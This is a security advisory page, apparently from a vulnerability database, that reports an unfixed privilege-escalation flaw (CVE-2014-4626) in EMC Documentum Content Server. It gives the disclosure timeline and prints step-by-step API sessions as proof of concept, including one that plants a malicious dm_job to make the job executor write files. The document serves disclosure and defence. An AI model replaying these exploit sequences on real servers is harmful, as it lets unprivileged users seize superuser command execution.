Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
securityvulnsSecurityvulnsSECURITYVULNS:DOC:32268
HistoryJul 05, 2015 - 12:00 a.m.

Extra information for CVE-2014-4626 - EMC Documentum Content Server: authenticated user is able to elevate privileges, hijack Content Server filesystem, execute arbitrary commands by creating malicious dm_job objects

2015-07-0500:00:00
vulners.com
14
JSON

Product: EMC Documentum Content Server
Vendor: EMC
Version: ANY
CVE: N/A
Risk: High
Status: public/not fixed

On April 2014 I discovered vulnerability in EMC Documentum Content Server
which allow authenticated user to elevate privileges, hijack Content Server
filesystem or execute arbitrary commands by creating malicious dm_job
objects (for detailed description see VRF#HUFU6FNP.txt and VRF#HUFV0UZN.txt).

On October 2014 vendor announced ESA-2014-105 which was claiming that
vulnerability has been remediated.

On November 2014 fix was contested (there was significant delay after
ESA-2014-105 because vendor constantly fails to provide status of reported
vulnerabilities) by providing PoC similar to described in VRF#HUGC34JH.txt,
description provided to CERT/CC (another CNA was chosen because vendor
fails to communicate) was:
=================================8<================================
The problem is that non-privileged user is able to create dm_job objects and
execute corresponding docbase methods (some examples of "malicious" methods
are given in VRF#HUFU6FNP, also see VRF#HUFV0UZN), the word "create" here
does mean some sequence of commands which result to existence of dm_job
object. PoC in VRF#HUFU6FNP describes attack on scheduler - scheduler does
not schedule jobs unless they are owned by superuser, so, the command
sequence in that case was: "create dm_job and update dm_job", EMC thinks
that they have fixed vulnerability, but they just fixed the sequence given
in PoC, another sequence is "create dm_sysobject, update dm_sysobject &
change dm_sysobject" - see VRF#HUGC34JH, it's already known attack.
Also, I could provide third PoC related to this report, but I do not think
that would be useful for EMC.
=================================>8================================

Current status of CVE-2014-4626 is obscure, last public status could be
found in CERT/CC spreadsheet (http://www.kb.cert.org/vuls/id/315340&#41;:
=================================8<================================
The new exploit is being tracked under PSRC-2494.
This is targeted for Q1 2015 (March patch).
=================================>8================================

Though latest builds of EMC Documentum Content Server successfully pass PoCs
described previously:
=================================8<================================
API> create,c,dm_job

08024be980006902
API> set,c,l,owner_name
SET> dmadmin

OK
API> set,c,l,world_permit
SET> 7

OK
API> save,c,l

[DM_SYSOBJECT_E_CANT_CHANGE_OWNER_NAME]error:
"Must have system admin privileges or superuser privileges
to change the owner_name to 'dmadmin'."

API> create,c,dm_sysobject

08024be980006904
API> set,c,l,owner_name
SET> dmadmin

OK
API> set,c,l,world_permit
SET> 7

OK
API> save,c,l

OK
API> ?,c,change dm_sysobject object to dm_job
where r_object_id='08024be980006904'
[DM_QUERY_F_CHANGE_SAVE]fatal: "CHANGE: An unexpected save
error has occurred for object 08024be980006904."

[DM_USER_E_NEED_SU_OR_SYS_FOR_OBJECT_CHANGE]error:
"The current user (test) needs to have superuser or sysadmin
privilege to create or save or destroy objects of type (dm_job)."
=================================>8================================

the vulnerability remains unfixed, below is a another PoC (job engine in
Documentum consists of two parts: scheduler and executor, previous attacks
were designed to exploit vulnerability in scheduler, this one demonstrates
how to exploit vulnerability in job executor):
=================================8<================================
API> create,c,dm_job

08024be98000690e
API> set,c,l,object_name
SET> malicious job

OK
API> set,c,l,inactivate_after_failure
SET> 0

OK
API> set,c,l,max_iterations
SET> 0

OK
API> set,c,l,method_name
SET> dm_file_writer

OK
API> set,c,l,pass_standard_arguments
SET> 0

OK
API> set,c,l,run_interval
SET> 1

OK
API> set,c,l,run_mode
SET> 1

OK
API> set,c,l,run_now
SET> 1

OK
API> set,c,l,is_inactive
SET> 0

OK
API> set,c,l,world_permit
SET> 7

OK
API> append,c,l,method_arguments
SET> /tmp/test.txt

OK
API> append,c,l,method_arguments
SET> agentexec_has_vulnerability

OK
API> append,c,l,method_arguments
SET> CREATE

OK
API> save,c,l

OK
API> apply,c,DO_METHOD,METHOD,S,agent_exec_method,
ARGUMENTS,S,'
-docbase_name DCTM_DEV.DCTM_DEV
-docbase_owner dmadmin
-job_id 08024be98000690e
-log_directory /u01/documentum/cs/dba/log
-docbase_id 150505
-trace_level 10
'

q0
API> next,c,q0

OK
API> dump,c,q0

USER ATTRIBUTES

result : 0
process_id : 91436
launch_failed : F
method_return_val : 0
os_system_error : No Error
timed_out : F
time_out_length : 60
app_server_host_name :
app_server_port : 0
app_server_uri :
error_message :

SYSTEM ATTRIBUTES

APPLICATION ATTRIBUTES

INTERNAL ATTRIBUTES

API> Bye
~]$ cat /tmp/test.txt
agentexec_has_vulnerability
=================================>8================================

__
Regards,
Andrey B. Panfilov

Related

prion 2
securityvulns 2
cve 2
cert 1
prion
prion
Authorization
2015-09-04 01:59:00
Command injection
2014-12-17 01:59:00
securityvulns
securityvulns
ESA-2015-144: EMC Documentum Content Server Privilege Escalation Vulnerability
2015-09-14 00:00:00
EMC Documentum multiple security vulnerabilities
2015-09-14 00:00:00
cve
cve
CVE-2015-4544
2015-09-04 01:59:00
CVE-2014-4626
2014-12-17 01:59:00
cert
cert
EMC Documentum products contain multiple vulnerabilities
2014-12-15 00:00:00
JSON
Related for SECURITYVULNS:DOC:32268
prion2securityvulns2cve2cert1